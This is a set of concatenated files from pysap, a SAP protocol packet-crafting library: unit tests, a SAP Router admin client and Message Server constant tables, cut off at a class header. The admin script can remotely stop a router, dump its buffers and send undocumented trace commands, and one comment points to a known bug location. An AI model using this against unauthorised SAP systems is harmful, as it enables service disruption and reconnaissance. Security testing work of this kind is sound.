# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import unittest
from struct import pack
# External imports
from scapy.fields import StrField
from scapy.packet import Packet, Raw
# Custom imports
from tests.utils import read_data_file
from pysap.SAPDiag import (SAPDiagItems, SAPDiagItem, SAPDiag, bind_diagitem,
                           diag_item_get_class)
from pysap.SAPDiagItems import SAPDiagDyntAtomItem


class PySAPDiagTest(unittest.TestCase):

    def test_sapdiag_header_build(self):
        """Test SAPDiag headers building"""
        diag_item = SAPDiagItem(item_value="TEST")

        diag_header_plain = SAPDiag(compress=0)
        diag_header_plain.message.append(diag_item)
        diag_plain_message = str(diag_header_plain.message)

        diag_header_compr = SAPDiag(compress=1)
        diag_header_compr.message.append(diag_item)
        diag_compr_message = str(diag_header_compr.message)

        self.assertEqual(diag_plain_message, diag_compr_message)

        diag_header_compr.compress = 0
        self.assertEqual(str(diag_header_plain), str(diag_header_compr))

    def test_sapdiag_header_dissection(self):
        """Test SAPDiag headers dissection"""
        diag_item = SAPDiagItem(item_value="TEST")

        diag_header_plain = SAPDiag(compress=0)
        diag_header_plain.message.append(diag_item)
        new_diag_header_plain = SAPDiag(str(diag_header_plain))

        self.assertEqual(str(diag_header_plain),
                         str(new_diag_header_plain))

        diag_header_compr = SAPDiag(compress=1)
        diag_header_compr.message.append(diag_item)
        new_diag_header_compr = SAPDiag(str(diag_header_compr))

        self.assertEqual(str(diag_header_compr),
                         str(new_diag_header_compr))

    def test_sapdiag_item(self):
        """Test construction of SAPDiag Items"""
        with self.assertRaises(KeyError):
            SAPDiagItem(item_type="LALA")

    def test_sapdiag_items(self):
        """Test dissection of Diag Items"""
        diag_items = SAPDiagItems(read_data_file('nw_703_login_screen_decompressed.data'))

        self.assertEqual(len(diag_items.message), 131)

        for item in diag_items.message:
            self.assertIsInstance(item, SAPDiagItem)

    def test_sapdiag_atoms(self):
        """Test dissection of Diag Items and Dynt Atom Items"""
        diag_items = SAPDiagItems(read_data_file('nw_703_login_screen_decompressed.data'))
        diag_packet = SAPDiag(message=diag_items.message)
        diag_atoms = diag_packet.get_item(0x12, 0x09, 0x02)

        for atom in diag_atoms:
            for atom_item in atom.item_value.items:
                self.assertIsInstance(atom_item, SAPDiagDyntAtomItem)

    def test_sapdiag_items_lookup(self):
        """Test lookup and filtering of SAPDiagItems inside a SAPDiag
        packet"""
        sapdiag = SAPDiag()

        sapdiag_ses_item = SAPDiagItem(item_type="SES")
        sapdiag.message.append(sapdiag_ses_item)

        sapdiag_appl_item = SAPDiagItem(item_type="APPL",
                                        item_id="ST_USER",
                                        item_sid="RFC_PARENT_UUID")
        sapdiag.message.append(sapdiag_appl_item)

        self.assertIn(sapdiag_ses_item, sapdiag.get_item(0x1))
        self.assertIn(sapdiag_ses_item, sapdiag.get_item("SES"))
        self.assertNotIn(sapdiag_ses_item, sapdiag.get_item(0x10))
        self.assertNotIn(sapdiag_ses_item, sapdiag.get_item("APPL"))

        self.assertIn(sapdiag_appl_item, sapdiag.get_item(0x10))
        self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL"))
        self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x04))
        self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER"))
        self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x04, 0x10))
        self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", 0x10))
        self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", "RFC_PARENT_UUID"))
        self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(0x1))
        self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL4"))
        self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x06))
        self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_R3INFO"))
        self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x04, 0x02))
        self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", 0x02))
        self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", "CONNECT"))

        self.assertListEqual([sapdiag_ses_item, sapdiag_appl_item], sapdiag.get_item([0x01, 0x10]))
        self.assertListEqual([sapdiag_ses_item, sapdiag_appl_item], sapdiag.get_item(["SES", "APPL"]))
        self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], [0x04, 0x06]))
        self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], ["ST_USER", "ST_R3INFO"]))
        self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], 0x04, [0x02, 0x10]))
        self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], "ST_USER", ["RFC_PARENT_UUID", "CONNECT"]))
        self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(["SES", "APPL4"]))
        self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], ["ST_R3INFO"]))
        self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], ["ST_USER"], ["CONNECT"]))

        # Insert a wrong item and observe that the lookup still works
        sapdiag.message.append(Raw("\x00" * 10))
        self.assertIn(sapdiag_ses_item, sapdiag.get_item("SES"))
        self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], "ST_USER", ["RFC_PARENT_UUID", "CONNECT"]))

    def test_sapdiag_items_bind(self):
        """Test binding of SAPDiagItem classes"""
        class SAPDiagItemTest(Packet):
            fields_desc = [StrField("strfield", None)]
        bind_diagitem(SAPDiagItemTest, "APPL", 0x99, 0xff)

        item_string = "strfield"
        item_value = SAPDiagItemTest(strfield=item_string)
        item = SAPDiagItem("\x10\x99\xff" + pack("!H", len(item_string)) + item_string)

        self.assertEqual(item.item_value, item_value)
        self.assertEqual(item.item_length, len(item_string))
        self.assertEqual(item.item_value.strfield, item_string)
        self.assertEqual(str(item.item_value), str(item_value))
        self.assertIs(diag_item_get_class(item, "APPL", 0x99, 0xff), SAPDiagItemTest)


def suite():
    loader = unittest.TestLoader()
    suite = unittest.TestSuite()
    suite.addTest(loader.loadTestsFromTestCase(PySAPDiagTest))
    return suite


if __name__ == "__main__":
    unittest.TextTestRunner(verbosity=2).run(suite())



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from socket import error
from datetime import datetime
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPNI import SAPNI, SAPNIStreamSocket
from pysap.SAPRouter import (SAPRouter, router_is_error, get_router_version,
                             SAPRouterInfoClients, SAPRouterInfoServer)


# Bind the SAPRouter layer
bind_layers(SAPNI, SAPRouter, )

# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = \
    """This example script connects with a SAP Router server and allows
    perform administrative tasks. The options are the ones found on the
    regular SAP Router tool with the addition of some undocumented
    operation codes.

    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host [%default]", default="127.0.0.1")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3299)
    target.add_option("--router-version", dest="router_version", type="int", help="SAP Router version to use [retrieve from the remote SAP Router]")
    parser.add_option_group(target)

    command = OptionGroup(parser, "Command")
    command.add_option("-s", "--stop-router", dest="stop", action="store_true", help="Stop router request")
    command.add_option("-o", "--soft-shutdown", dest="soft", action="store_true", help="Soft shutdown request")
    command.add_option("-l", "--router-info", dest="info", action="store_true", help="Router info request")
    command.add_option("-P", "--info-pass", dest="info_password", action="store", help="Password for info request")
    command.add_option("-n", "--new-route", dest="new_route", action="store_true", help="New route table request")
    command.add_option("-t", "--toggle-trace", dest="trace", action="store_true", help="Toggle trace request")
    command.add_option("-c", "--cancel-route", dest="cancel", action="store", help="Cancel route request")
    command.add_option("-b", "--dump-buffer", dest="dump", action="store_true", help="Dump buffers request")
    command.add_option("-f", "--flush-buffer", dest="flush", action="store_true", help="Flush buffers request")
    command.add_option("-z", "--hide-errors", dest="hide", action="store_true", help="Hide errors info")
    command.add_option("--set-peer-trace", dest="set_peer", action="store", help="Set peer trace (undocumented command)")
    command.add_option("--clear-peer-trace", dest="clear_peer", action="store", help="Clear peer trace (undocumented command)")
    command.add_option("--trace-connection", dest="trace_conn", action="store", help="Trace connection (undocumented command)")
    parser.add_option_group(command)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    response = False

    p = SAPRouter(type=SAPRouter.SAPROUTER_ADMIN)

    if options.stop:
        p.adm_command = 5
        print("[*] Requesting stop of the remote SAP Router")

    elif options.soft:
        p.adm_command = 9
        print("[*] Requesting a soft shutdown of the remote SAP Router")
        response = True

    elif options.info:
        p.adm_command = 2
        if options.info_password:
            if len(options.info_password) > 19:
                print("[*] Password too long, truncated at 19 characters")
            p.adm_password = options.info_password
            print("[*] Requesting info using password %s" % p.adm_password)
        else:
            print("[*] Requesting info")
        response = True

    elif options.new_route:
        p.adm_command = 3
        print("[*] Requesting a refresh of the router table")

    elif options.trace:
        p.adm_command = 4
        print("[*] Requesting a toggle on the trace settings")

    elif options.cancel:
        p.adm_command = 6
        p.adm_client_ids = list(map(int, options.cancel.split(",")))
        print("[*] Requesting a cancel of the route(s) with client id(s) %s" % p.adm_client_ids)
        response = True

    elif options.dump:
        p.adm_command = 7
        print("[*] Requesting a dump of the buffers")

    elif options.flush:
        p.adm_command = 8
        print("[*] Requesting a flush of the buffers")

    elif options.hide:
        p.adm_command = 14
        print("[*] Requesting a hide on the errors to clients")
        response = True

    elif options.set_peer:
        p.adm_command = 10
        p.adm_address_mask = options.set_peer
        print("[*] Request a set peer trace for the address mask %s" % p.adm_address_mask)
        response = True

    elif options.clear_peer:
        p.adm_command = 11
        p.adm_address_mask = options.clear_peer
        print("[*] Request a clear peer trace for the address mask %s" % p.adm_address_mask)
        response = True

    elif options.trace_conn:
        p.adm_command = 12
        p.adm_client_ids = list(map(int, options.trace_conn.split(",")))
        print("[*] Requesting a connection trace with client id(s) %s" % p.adm_client_ids)
        response = True

    else:
        print("[*] No command specified !")
        return

    # Initiate the connection
    conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port)
    print("[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port))

    # Retrieve the router version used by the server if not specified
    if options.router_version:
        p.version = options.router_version
    else:
        p.version = get_router_version(conn) or p.version
    print("[*] Using SAP Router version %d" % p.version)

    # Send the router admin request
    print("[*] Sending Router Admin packet")
    if options.verbose:
        p.show2()
    conn.send(p)

    # Grab the response if required
    if response:

        # Some responses has no SAPRouter's packet format and are raw strings,
        # we need to get the SAP NI layer first and then check if we could go
        # down to the SAPRouter layer.
        raw_response = conn.recv()[SAPNI]
        if SAPRouter in raw_response:
            router_response = raw_response[SAPRouter]

        # If the response was null, just return
        elif raw_response.length == 0:
            return

        # If the response is an error, print and exit
        if router_is_error(router_response):
            print("[*] Error requesting info:")
            if options.verbose:
                router_response.show2()
            else:
                print(router_response.err_text_value.error)

        # Otherwise, print the packets sent by the SAP Router
        else:
            print("[*] Response:\n")

            if options.info:
                # Decode the first packet as a list of info client
                raw_response.decode_payload_as(SAPRouterInfoClients)

                clients = []
                clients.append("\t".join(["ID", "Client", "Partner", "Service", "Connected on"]))
                clients.append("-" * 60)
                for client in raw_response.clients:

                    # If the trace flag is set, add a mark
                    flag = "(*)" if client.flag_traced else "(+)" if client.flag_routed else ""

                    fields = [str(client.id),
                              client.address,
                              "%s%s" % (flag, client.partner) if client.flag_routed else "(no partner)",
                              client.service if client.flag_routed else "",
                              datetime.fromtimestamp(client.connected_on).ctime()]
                    clients.append("\t".join(fields))

                # Decode the second packet as server info
                raw_response = conn.recv()
                raw_response.decode_payload_as(SAPRouterInfoServer)

                print("SAP Network Interface Router running on port %d (PID = %d)\n"
                      "Started on: %s\n"
                      "Parent process: PID = %d, port = %d\n" % (raw_response.port, raw_response.pid,
                                                                 datetime.fromtimestamp(raw_response.started_on).ctime(),
                                                                 raw_response.ppid, raw_response.pport))

                print("\n".join(clients))
                print("(*) Connections being traced")

            # Show the plain packets returned
            try:
                raw_response = conn.recv()
                while (raw_response):
                    print(raw_response.payload)
                    raw_response = conn.recv()
            except error:
                pass


if __name__ == "__main__":
    main()



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# External imports
from scapy.layers.inet import TCP
from scapy.packet import Packet, bind_layers
from scapy.fields import (ByteField, ConditionalField, StrFixedLenField, FlagsField,
                          IPField, ShortField, IntField, StrField, PacketListField,
                          FieldLenField, PacketField, StrLenField, IntEnumField,
                          StrNullField)
from scapy.layers.inet6 import IP6Field
# Custom imports
from pysap.SAPNI import SAPNI
from pysap.utils import (PacketNoPadded, ByteEnumKeysField, IntToStrField,
                         ShortEnumKeysField, StrNullFixedLenPaddedField,
                         StrNullFixedLenField)


# Message Server Flag values
ms_flag_values = {
    0x01: "MS_ONE_WAY",  # One way messages are sent from the client to server and doesn't trigger a response from the server
    0x02: "MS_REQUEST",
    0x03: "MS_REPLY",
    0x04: "MS_ADMIN",
}
"""Message Server Flag values"""


# Message Server IFlag values
ms_iflag_values = {
    0x01: "MS_SEND_NAME",
    0x02: "MS_SEND_TYPE",
    0x03: "MS_LOGIN",
    0x04: "MS_LOGOUT",
    0x05: "MS_ADM_OPCODES",
    0x06: "MS_MOD_MSGTYPES",
    0x07: "MS_SEND_TYPE_ONCE",
    0x08: "MS_LOGIN_2",
    0x09: "MS_MOD_STATE",
    0x0a: "MS_J2EE_LOGIN",
    0x0c: "MS_J2EE_SEND_TO_CLUSTERID",
    0x0d: "MS_J2EE_SEND_BROADCAST",
    0x0e: "MS_SEND_TYPE_ACK",
    0x0f: "MS_J2EE_LOGIN_2",
    0x10: "MS_SEND_SERVICE",
    0x11: "MS_J2EE_LOGIN_3",
    0x12: "MS_J2EE_LOGIN_4",
}
"""Message Server IFlag values"""


# Message Server Error values
ms_errorno_values = {
    0: "MSERECONNECTION",
    1: "MSENISELWRITE",
    2: "MSENISELREAD",
    3: "MSENIQUEUE",
    4: "MSENILAYER",
    71: "MSETESTSOFTSHUTDOWN",
    72: "MSENOTINIT",
    73: "MSEALREADYINIT",
    74: "MSEINVHDL",
    75: "MSEWRONGSERVER",
    76: "MSEMOREDATA",
    77: "MSESNDTYPEFAILED",
    78: "MSEDUPKEY",
    79: "MSESOFTSHUTDOWN",
    81: "MSENOMEM",
    82: "MSEHEADERINCOMPLETE",
    83: "MSETYPESNOTALLOWED",
    84: "MSEACCESSDENIED",
    85: "MSEWRITEINCOMPLETE",
    86: "MSEREADINCOMPLETE",
    87: "MSEADMIN",
    88: "MSESOCKTOOLARGE",
    89: "MSENOSLOTFREE",
    90: "MSESHUTDOWN",
    91: "MSEREPLYTOOLARGE",
    92: "MSEWRONGVERSION",
    93: "MSEMSGDESTROYED",
    94: "MSENOTUNIQUE",
    95: "MSEPARTNERUNKNOWN",
    96: "MSEPARTNERDIED",
    97: "MSEWRONGTYPE",
    98: "MSEWRONGNAME",
    99: "MSEWAKEUP",
    100: "MSENOTFOUND",
    101: "MSEINVAL",
    102: "MSENOMSG",
    103: "MSEINTERN",
}
"""Message Server Error values"""


# Message Server Administration messages type values
ms_adm_type_values = {
    1: "ADM_REQUEST",
    2: "ADM_REPLY",
}
"""Message Server Administration messages type values"""


# Message Server Administration messages opcode values
ms_adm_opcode_values = {
    0x00: "AD_GENERAL",
    0x01: "AD_PROFILE",  # *
    0x02: "AD_WPSTAT",
    0x03: "AD_QUEUE",
    0x04: "AD_STARTSTOP",
    0x05: "AD_WPCONF",
    0x06: "AD_USRLST",
    0x07: "AD_WPKILL",
    0x08: "AD_TIMEINFO",  # *
    0x09: "AD_TM_RECONNECT",
    0x0a: "AD_ALRT_GET_STATE",
    0x0b: "AD_ALRT_OPERATION",
    0x0c: "AD_ALRT_SET_PARAM",
    0x0d: "AD_DB_RECONNECT",
    0x0e: "AD_ECHO",  # *
    0x0f: "AD_MSGSERVER",  # *
    0x10: "AD_WPCONF2",
    0x11: "AD_GENERAL2",
    0x12: "AD_SET_LIST_PARAM",
    0x13: "AD_DUMP_STATUS",
    0x14: "AD_RZL",
    0x15: "AD_RZL_STRG",  # *
    0x16: "AD_COUNT_WPS",
    0x17: "AD_QUEUE2",
    0x19: "AD_EM",
    0x1a: "AD_ES",
    0x1b: "AD_SHUTDOWN_STATE",
    0x1c: "AD_SHUTDOWN_INFO",
    0x1d: "AD_SHUTDOWN_ERROR",
    0x1f: "AD_DISPLACE",
    0x20: "AD_GET_TIMETAB",
    0x21: "AD_SET_TIMETAB",
    0x28: "AD_MSBUF",
    0x29: "AD_ARFC_NOREQ",
    0x2a: "AD_ENQID_INFO",
    0x2b: "AD_DEL_USER",
    0x2c: "AD_SPO_ADM",
    0x2d: "AD_NTAB_SYNC",
    0x2e: "AD_SHARED_PARAMETER",  # *
    0x2f: "AD_RESET_TRACE",
    0x30: "AD_RESET_USR02",
    0x31: "AD_WALL_CREATE",
    0x32: "AD_WALL_DELETE",
    0x33: "AD_WALL_MODIFY",
    0x34: "AD_SERVER_STATE",
    0x3c: "AD_SELFIDENT",  # *
    0x3d: "AD_DP_TRACE_CHANGE",
    0x3e: "AD_DP_DUMP_NIHDL",
    0x3f: "AD_DP_CALL_DELAYED",
    0x40: "AD_GW_ADM",
    0x41: "AD_DP_WAKEUP_MODE",
    0x42: "AD_VMC_SYS_EVENT",
    0x43: "AD_SHARED_PARAM_ALL_WPS",
    0x44: "AD_SECSESSION_UPDATE",
    0x45: "AD_SECSESSION_TERMINATE",
    0x46: "AD_ASRF_REQUEST",
    0x47: "AD_GET_NILIST",
    0x48: "AD_LOAD_INFO",
    0x49: "AD_TEST",
    0x4a: "AD_HANDLE_ACL",
    0x4b: "AD_ENQ_LOG_RESET",
}
"""Message Server Administration messages opcode values"""


# Message Server Administration Messages AD_RZL_STRG string types values
ms_adm_rzl_strg_type_values = {
    10: "STRG_TYPE_READALL",
    11: "STRG_TYPE_READALL_I",
    12: "STRG_TYPE_READALL_C",
    13: "STRG_TYPE_READALL_LC",
    15: "STRG_TYPE_READALL_OFFSET_I",
    16: "STRG_TYPE_READALL_OFFSET_C",
    17: "STRG_TYPE_READALL_OFFSET_LC",
    20: "STRG_TYPE_READALL_OFFSET",
    21: "STRG_TYPE_READ_I",
    22: "STRG_TYPE_READ_C",
    23: "STRG_TYPE_READ_LC",
    31: "STRG_TYPE_WRITE_I",
    32: "STRG_TYPE_WRITE_C",
    33: "STRG_TYPE_WRITE_LC",
    41: "STRG_TYPE_DEL_I",
    42: "STRG_TYPE_DEL_C",
    43: "STRG_TYPE_DEL_LC",
    51: "STRG_TYPE_CREATE_I",
    52: "STRG_TYPE_CREATE_C",
    53: "STRG_TYPE_CREATE_LC",
    90: "STRG_TYPE_DUMP",
}
"""Message Server Administration Messages AD_RZL_STRG string types values"""


# Message Server OpCode values
ms_opcode_values = {
    1: "MS_SERVER_CHG",
    2: "MS_SERVER_ADD",
    3: "MS_SERVER_SUB",
    4: "MS_SERVER_MOD",
    5: "MS_SERVER_LST",
    6: "MS_CHANGE_IP",
    7: "MS_SET_SECURITY_KEY",
    8: "MS_GET_SECURITY_KEY",
    9: "MS_GET_SECURITY_KEY2",
    10: "MS_GET_HWID",
    11: "MS_INCRE_TRACE",
    12: "MS_DECRE_TRACE",
    13: "MS_RESET_TRACE",
    14: "MS_ACT_STATISTIC",
    15: "MS_DEACT_STATISTIC",
    16: "MS_RESET_STATISTIC",
    17: "MS_GET_STATISTIC",
    18: "MS_DUMP_NIBUFFER",
    19: "MS_RESET_NIBUFFER",
    20: "MS_OPEN_REQ_LST",
    21: "MS_SERVER_INFO",
    22: "MS_SERVER_LIST",
    23: "MS_SERVER_ENTRY",
    24: "MS_DOMAIN_INFO",
    25: "MS_DOMAIN_LIST",
    26: "MS_DOMAIN_ENTRY",
    27: "MS_MAP_URL_TO_ADDR",
    28: "MS_GET_CODEPAGE",
    29: "MS_SOFT_SHUTDOWN",
    30: "MS_DUMP_INFO",
    31: "MS_FILE_RELOAD",
    32: "MS_RESET_DOMAIN_CONN",
    33: "MS_NOOP",
    34: "MS_SET_TXT",
    35: "MS_GET_TXT",
    36: "MS_COUNTER_CREATE",
    37: "MS_COUNTER_DELETE",
    38: "MS_COUNTER_INCREMENT",
    39: "MS_COUNTER_DECREMENT",
    40: "MS_COUNTER_REGISTER",
    41: "MS_COUNTER_GET",
    42: "MS_COUNTER_LST",
    43: "MS_SET_LOGON",
    44: "MS_GET_LOGON",
    45: "MS_DEL_LOGON",
    46: "MS_SERVER_DISC",
    47: "MS_SERVER_SHUTDOWN",
    48: "MS_SERVER_SOFT_SHUTDOWN",
    49: "MS_J2EE_CLUSTERNODE_CHG",
    50: "MS_J2EE_CLUSTERNODE_ADD",
    51: "MS_J2EE_CLUSTERNODE_SUB",
    52: "MS_J2EE_CLUSTERNODE_MOD",
    53: "MS_J2EE_CLUSTERNODE_LST",
    54: "MS_J2EE_SERVICE_REG",
    55: "MS_J2EE_SERVICE_UNREG",
    56: "MS_J2EE_SERVICE_LST",
    57: "MS_J2EE_SERVICE_ADD",
    58: "MS_J2EE_SERVICE_SUB",
    59: "MS_J2EE_SERVICE_MOD",
    60: "MS_J2EE_MOD_STATE",
    61: "MS_J2EE_SERVICE_GET",
    62: "MS_J2EE_SERVICE_REG2",
    63: "MS_NITRACE_SETGET",
    64: "MS_SERVER_LONG_LIST",
    65: "MS_J2EE_DEBUG_ENABLE",
    66: "MS_J2EE_DEBUG_DISABLE",
    67: "MS_SET_PROPERTY",
    68: "MS_GET_PROPERTY",
    69: "MS_DEL_PROPERTY",
    70: "MS_IP_PORT_TO_NAME",
    71: "MS_CHECK_ACL",
    72: "MS_LICENSE_SRV",
    74: "MS_SERVER_TEST_SOFT_SHUTDOWN",
    75: "MS_J2EE_RECONNECT_P1",
    76: "MS_J2EE_RECONNECT_P2",
}
"""Message Server OpCode values"""


# Message Server OpCode Error Values
ms_opcode_error_values = {
    0: "MSOP_OK",
    1: "MSOP_UNKNOWN_OPCODE",
    2: "MSOP_NOMEM",
    3: "MSOP_SECURITY_KEY_NOTSET",
    4: "MSOP_UNKNOWN_CLIENT",
    5: "MSOP_ACCESS_DENIED",
    6: "MSOP_REQUEST_REQUIRED",
    7: "MSOP_NAME_REQUIRED",
    8: "MSOP_GET_HWID_FAILED",
    9: "MSOP_SEND_FAILED",
    10: "MSOP_UNKNOWN_DOMAIN",
    11: "MSOP_UNKNOWN_SERVER",
    12: "MSOP_NO_DOMAIN_SERVER",
    13: "MSOP_INVALID_URL",
    14: "MSOP_UNKNOWN_DUMP_REQ",
    15: "MSOP_FILENOTFOUND",
    16: "MSOP_UNKNOWN_RELOAD_REQ",
    17: "MSOP_FILENOTDEFINED",
    18: "MSOP_CONVERT_FAILED",
    19: "MSOP_NOTSET",
    20: "MSOP_COUNTER_EXCEEDED",
    21: "MSOP_COUNTER_NOTFOUND",
    22: "MSOP_COUNTER_DELETED",
    23: "MSOP_COUNTER_EXISTS",
    24: "MSOP_EINVAL",
    25: "MSOP_NO_J2EE_CLUSTERNODE",
    26: "MSOP_UNKNOWN_PROPERTY",
    27: "MSOP_UNKNOWN_VERSION",
    28: "MSOP_ICTERROR",
    29: "MSOP_KERNEL_INCOMPATIBLE",
    30: "MSOP_NIACLCREATE_FAILED",
    31: "MSOP_NIACLSYNTAX_ERROR",
}
"""Message Server OpCode Error Values"""


# Message Server Property ID Values
ms_property_id_values = {
    1: "MS_PROPERTY_TEXT",
    2: "MS_PROPERTY_VHOST",
    3: "MS_PROPERTY_IPADR",
    4: "MS_PROPERTY_PARAM",  # ZDI Bugs are here
    5: "MS_PROPERTY_SERVICE",
    6: "MS_PROPERTY_DELALT",
    7: "Release information"
}
"""Message Server Property ID Values"""


# Message Server Dump Info ID Values
ms_dump_command_values = {
    1: "MS_DUMP_MSADM",
    2: "MS_DUMP_CON",
    3: "MS_DUMP_PARAMS",
    4: "MS_DUMP_ALL_CLIENTS",
    5: "MS_DUMP_ALL_SERVER",
    6: "MS_DUMP_ALL_DOMAIN",
    7: "MS_DUMP_DOMAIN_CONN",
    8: "MS_DUMP_RELEASE",
    9: "MS_DUMP_SIZEOF",
    10: "MS_DUMP_FIADM",
    11: "MS_DUMP_FICON",
    12: "MS_DUMP_COUNTER",
    13: "MS_DUMP_STATISTIC",
    14: "MS_DUMP_NIBUF",
    15: "MS_DUMP_URLMAP",
    16: "MS_DUMP_URLPREFIX",
    17: "MS_DUMP_URLHANDLER",
    18: "MS_DUMP_NOSERVER",
    19: "MS_DUMP_ACLINFO",
    20: "MS_DUMP_PERMISSION_TABLE",
    21: "MS_DUMP_J2EE_CLUSTER_STAT",
    22: "MS_DUMP_ACL_FILE_EXT",
    23: "MS_DUMP_ACL_FILE_INT",
    24: "MS_DUMP_ACL_FILE_ADMIN",
    25: "MS_DUMP_ACL_FILE_EXTBND",
    26: "MS_DUMP_ACL_FILE_HTTP",
    27: "MS_DUMP_ACL_FILE_HTTPS",
}
"""Message Server Dump Info ID Values"""


# Message Server File Reload values
ms_file_reload_values = {
    1: "MS_RELOAD_CLIENT_TAB",
    2: "MS_RELOAD_SERVER_TAB",
    3: "MS_RELOAD_DOMAIN_TAB",
    4: "MS_RELOAD_URLMAP",
    5: "MS_RELOAD_URLPREFIX",
    6: "MS_RELOAD_ACL_INFO",
    7: "MS_RELOAD_PERMISSION_TABLE",
    8: "MS_RELOAD_STOC",
    9: "MS_RELOAD_ACL_FILE_EXT",
    10: "MS_RELOAD_ACL_FILE_INT",
    11: "MS_RELOAD_ACL_FILE_ADMIN",
    12: "MS_RELOAD_ACL_FILE_EXTBND",
    13: "MS_RELOAD_ACL_FILE_HTTP",
    14: "MS_RELOAD_ACL_FILE_HTTPS",
}
"""Message Server File Reload values"""


# Message Server Logon type values
ms_logon_type_values = {
    0: "MS_LOGON_DIAG_LB",
    1: "MS_LOGON_DIAG_LBS",
    2: "MS_LOGON_DIAG",
    3: "MS_LOGON_DIAGS",
    4: "MS_LOGON_RFC",
    5: "MS_LOGON_RFCS",
    6: "MS_LOGON_HTTP",
    7: "MS_LOGON_HTTPS",
    8: "MS_LOGON_FTP",
    9: "MS_LOGON_SMTP",
    10: "MS_LOGON_NNTP",
    11: "MS_LOGON_DIAG_E",
    12: "MS_LOGON_DIAGS_E",
    13: "MS_LOGON_RFC_E",
    14: "MS_LOGON_RFCS_E",
    15: "MS_LOGON_HTTP_E",
    16: "MS_LOGON_HTTPS_E",
    17: "MS_LOGON_FTP_E",
    18: "MS_LOGON_SMTP_E",
    19: "MS_LOGON_NNTP_E",
    20: "MS_LOGON_J2EE",
    21: "MS_LOGON_J2EES",
    22: "MS_LOGON_J2EE_E",
    23: "MS_LOGON_J2EES_E",
    24: "MS_LOGON_P4",
    25: "MS_LOGON_P4S",
    26: "MS_LOGON_IIOP",
    27: "MS_LOGON_IIOPS",
    28: "MS_LOGON_SDM",
    29: "MS_LOGON_TELNET",
    30: "MS_LOGON_DEBUG",
    31: "MS_LOGON_DPROXY",
    32: "MS_LOGON_P4HTTP",
    33: "MS_LOGON_HTTPRI",
    34: "MS_LOGON_HTTPSRI",
    35: "MS_LOGON_J2EERI",
    36: "MS_LOGON_J2EESRI",
    37: "MS_LOGON_TRXNS",
}
"""Message Server Logon type values"""


ms_client_status_values = {
    0: "MS_STATE_UNKNOWN",
    1: "ACTIVE",
    2: "INACTIVE",
    3: "MS_STATE_SHUTDOWN",
    4: "MS_STATE_STOP",
    5: "MS_STATE_STARTING",
    6: "MS_STATE_INIT",
}
"""Message Server Client status values"""


class SAPMSAdmRecord(PacketNoPadded):
